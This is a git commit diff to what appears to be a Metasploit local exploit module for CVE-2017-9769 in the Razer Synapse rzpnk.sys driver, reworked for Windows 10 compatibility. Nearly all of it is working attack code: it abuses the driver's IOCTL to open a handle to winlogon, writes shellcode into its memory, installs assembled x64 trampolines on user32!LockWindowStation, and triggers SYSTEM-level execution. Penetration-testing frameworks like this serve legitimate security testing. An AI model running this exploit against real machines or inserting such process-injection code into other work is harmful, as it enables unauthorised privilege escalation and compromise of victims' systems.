Change the hook for windows 10 compatibility

zeroSteiner · zeroSteiner · commit 5470670223ae · 2017-07-13T11:49:06.000-04:00
diff --git a/modules/exploits/windows/local/razer_zwopenprocess.rb b/modules/exploits/windows/local/razer_zwopenprocess.rb
@@ -13,26 +13,29 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Local::WindowsKernel
   include Msf::Post::Windows::Priv
 
+  # the max size our hook can be, used before it's generated for the allocation
+  HOOK_STUB_MAX_LENGTH = 256
+
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Razer Synapse rzpnk.sys IOCTL',
+      'Name'           => 'Razer Synapse rzpnk.sys ZwOpenProcess',
       'Description'    => %q{
         A vulnerability exists in the latest version of Razer Synapse
-        (v2.20.17.302) which can be leveraged locally by a malicious application
-        to elevate its privileges to those of NT_AUTHORITY\SYSTEM. The
-        vulnerability lies in a specific IOCTL handler in the rzpnk.sys driver
-        that passes a PID specified by the user to ZwOpenProcess. This can be
-        issued by an application to open a handle to an arbitrary process with
-        the necessary privileges to allocate, read and write memory in the
-        specified process.
+        (v2.20.15.1104 as of the day of disclosure) which can be leveraged
+        locally by a malicious application to elevate its privileges to those of
+        NT_AUTHORITY\SYSTEM. The vulnerability lies in a specific IOCTL handler
+        in the rzpnk.sys driver that passes a PID specified by the user to
+        ZwOpenProcess. This can be issued by an application to open a handle to
+        an arbitrary process with the necessary privileges to allocate, read and
+        write memory in the specified process.
 
         This exploit leverages this vulnerability to open a handle to the
         winlogon process (which runs as NT_AUTHORITY\SYSTEM) and infect it by
-        installing hooks to execute attacker controlled shellcode. These hooks
-        are then triggered on demand by calling user32!LockWorkStation(),
-        resulting in the attacker's payload being executed with the privileges
-        of the infected winlogon process. In order for the issued IOCTL to work,
-        the RazerIngameEngine.exe process must not be running. This exploit will
+        installing a hook to execute attacker controlled shellcode. This hook is
+        then triggered on demand by calling user32!LockWorkStation(), resulting
+        in the attacker's payload being executed with the privileges of the
+        infected winlogon process. In order for the issued IOCTL to work, the
+        RazerIngameEngine.exe process must not be running. This exploit will
         check if it is, and attempt to kill it as necessary.
 
         The vulnerable software can be found here:
@@ -45,20 +48,21 @@ def initialize(info = {})
       'Author'         => 'Spencer McIntyre',
       'License'        => MSF_LICENSE,
       'References'     => [
-        ['CVE', 'CVE-2017-9769'],
-        #['URL', ''],
+        ['CVE', '2017-9769'],
+        ['URL', 'https://warroom.securestate.com/cve-2017-9769/']
       ],
       'Platform'       => 'win',
       'Targets'        =>
         [
           # Tested on (64 bits):
           # * Windows 7 SP1
-          # * Windows 10.0.14385
+          # * Windows 10.0.10586
           [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
         ],
       'DefaultOptions' =>
         {
-          'EXITFUNC'   => 'thread'
+          'EXITFUNC'   => 'thread',
+          'WfsDelay'   => 20
         },
       'DefaultTarget'  => 0,
       'Privileged'     => true,
@@ -103,42 +107,47 @@ def exploit
     end
 
     pid = session.sys.process['winlogon.exe']
-    print_status("Found winlogon.exe pid: #{pid}")
+    print_status("Found winlogon pid: #{pid}")
 
     handle = get_handle(pid)
     fail_with(Failure::NotVulnerable, 'Failed to open the process handle') if handle.nil?
+    vprint_status('Successfully opened a handle to the winlogon process')
 
     winlogon = session.sys.process.new(pid, handle)
-    shellcode_address = winlogon.memory.allocate(4096)
+    allocation_size = payload.encoded.length + HOOK_STUB_MAX_LENGTH
+    shellcode_address = winlogon.memory.allocate(allocation_size)
     winlogon.memory.protect(shellcode_address)
-    print_good("Allocated 4096 bytes in winlogon.exe at 0x#{shellcode_address.to_s(16)}")
+    print_good("Allocated #{allocation_size} bytes in winlogon at 0x#{shellcode_address.to_s(16)}")
     winlogon.memory.write(shellcode_address, payload.encoded)
     hook_stub_address = shellcode_address + payload.encoded.length
 
-    result = session.railgun.kernel32.LoadLibraryA('winsta')
-    fail_with(Failure::Unknown, 'Failed to get a handle to winsta.dll') if result['return'] == 0
-    winsta_handle = result['return']
+    result = session.railgun.kernel32.LoadLibraryA('user32')
+    fail_with(Failure::Unknown, 'Failed to get a handle to user32.dll') if result['return'] == 0
+    user32_handle = result['return']
 
     # resolve and backup the functions that we'll install trampolines in
-    winsta_trampolines = {}  # address => original chunk
-    winsta_functions = ['_WinStationWaitForConnect', 'WinStationIsSessionRemoteable']
-    winsta_functions.each do |function|
-      address = get_address(winsta_handle, function)
+    user32_trampolines = {}  # address => original chunk
+    user32_functions = ['LockWindowStation']
+    user32_functions.each do |function|
+      address = get_address(user32_handle, function)
       winlogon.memory.protect(address)
-      winsta_trampolines[function] = {
+      user32_trampolines[function] = {
         address:  address,
         original: winlogon.memory.read(address, 24)
       }
     end
 
     # generate and install the hook asm
-    hook_stub = get_hook(shellcode_address, winsta_trampolines)
+    hook_stub = get_hook(shellcode_address, user32_trampolines)
     fail_with(Failure::Unknown, 'Failed to generate the hook stub') if hook_stub.nil?
+    # if this happens, there was a programming error
+    fail_with(Failure::Unknown, 'The hook stub is too large, please update HOOK_STUB_MAX_LENGTH') if hook_stub.length > HOOK_STUB_MAX_LENGTH
+
     winlogon.memory.write(hook_stub_address, hook_stub)
-    vprint_status("Wrote the #{hook_stub.length} byte hook stub in winlogon.exe at 0x#{hook_stub_address}")
+    vprint_status("Wrote the #{hook_stub.length} byte hook stub in winlogon at 0x#{hook_stub_address.to_s(16)}")
 
     # install the asm trampolines to jump to the hook
-    winsta_trampolines.each do |function, trampoline_info|
+    user32_trampolines.each do |function, trampoline_info|
       address = trampoline_info[:address]
       trampoline = Metasm::Shellcode.assemble(Metasm::X86_64.new, %{
         mov  rax, 0x#{address.to_s(16)}
@@ -147,7 +156,7 @@ def exploit
         jmp  rax
       }).encode_string
       winlogon.memory.write(address, trampoline)
-      vprint_status("Installed winsta!#{address} trampoline at 0x#{address.to_s(16)}")
+      vprint_status("Installed user32!#{function} trampoline at 0x#{address.to_s(16)}")
     end
 
     session.railgun.user32.LockWorkStation()
@@ -241,7 +250,6 @@ def get_hook(shellcode_address, restore)
       pop  r9
       ret
     }
-    print_line(stub)
     Metasm::Shellcode.assemble(Metasm::X86_64.new, stub).encode_string
   end
 end
